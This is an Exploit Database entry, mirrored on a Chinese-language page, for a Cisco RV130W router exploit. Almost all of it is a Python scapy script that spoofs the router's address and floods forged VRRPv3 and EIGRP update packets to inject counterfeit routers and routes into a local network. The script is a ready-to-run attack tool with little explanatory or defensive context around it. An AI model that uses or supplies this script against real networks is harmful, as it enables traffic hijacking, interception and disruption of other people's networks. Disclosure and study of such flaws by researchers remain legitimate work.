Cisco small business RV130W 1.0.3.44 – Inject Counterfeit Routers

• Exploit Database
• 14 阅读

• 作者： Michael Alamoot
  日期： 2021-09-27
• 类别：

  • remote
  平台：

  • hardware
• 来源：https://www.exploit-db.com/exploits/50335/

• # Exploit Title: Cisco small business RV130W 1.0.3.44 - Inject Counterfeit Routers
  # Date: 24/09/2021
  # Exploit Author: Michael Alamoot
  # Vendor Homepage: https://www.cisco.com/
  # Version: RV130W 1.0.3.44
  # Tested on: Kali linux
  
  #! /usr/bin/env python3 
  from scapy.contrib.eigrp import EIGRPAuthData
  from scapy.contrib.eigrp import EIGRPIntRoute
  from scapy.contrib.eigrp import EIGRPGeneric
  from scapy.contrib.eigrp import EIGRPSeq
  from scapy.contrib.eigrp import EIGRP 
  from scapy.layers.vrrp import VRRPv3
  from scapy.layers.vrrp import VRRP
  from scapy.layers.l2 import Ether
  from scapy.layers.inet import IP 
  from scapy.sendrecv import sendp
  from scapy.volatile import RandMAC
  from scapy.all import conf
  import socket,networkx,os
  import argparse,sys,asyncio
  
  class argX:
  def __init__(self):
  self.parser = argparse.ArgumentParser(description="...")
  self.parser.add_argument(
  "-i","--ip",
  help="ip router fake injection",
  dest="ip",
  )
  self.parser.add_argument(
  "-r","--ip-router",
  help="ip router root",
  dest="router",
  default=conf.route.route('0.0.0.0')[2]
  )
  
  def argvX(self):
  """ [0] ip-router [1] ip-fake """
  args = self.parser.parse_args()
  ip = args.ip
  route = args.router
  return [ip,route]
  
  
  class exploit(object):
  
  def __new__(cls,*args,**kwargs):
  return super(exploit,cls).__new__(cls) 
  
  def __init__(self,IProuter,InjectFackeRouter):
  self.IProuter = IProuter
  self.InjectFackeRouter = InjectFackeRouter
  self.MAC = RandMAC()
  
  def pyload(self):
  pyload = Ether()/IP(src=self.IProuter,dst="224.0.0.18")\
  /VRRPv3(version=3,type=1,vrid=1,priority=100,res=0,adv=100,addrlist=self.InjectFackeRouter)\
  /IP(src=self.IProuter,dst="224.0.0.10") \
  /EIGRP(opcode="Update",asn=100,seq=0,ack=0 
  ,tlvlist=[EIGRPIntRoute(dst=self.InjectFackeRouter,nexthop=self.IProuter)])
  return pyload
  
  def start(self,count=[0,100]):
  for i in range(count[0],count[1]):
  sendp(self.pyload(),verbose=0,return_packets=False,inter=0,loop=0)
  print(f"\033[41m PACKET \033[0m Injection fake routers {self.IProuter} {self.InjectFackeRouter} \033[31m{i}\033[0m")
  
  if __name__ == "__main__":
  a = argX().argvX()
  if a[0]:
  net1 = exploit(IProuter=a[1],InjectFackeRouter=a[0])
  net1.start()
  else:
  print("[-h] [--help]")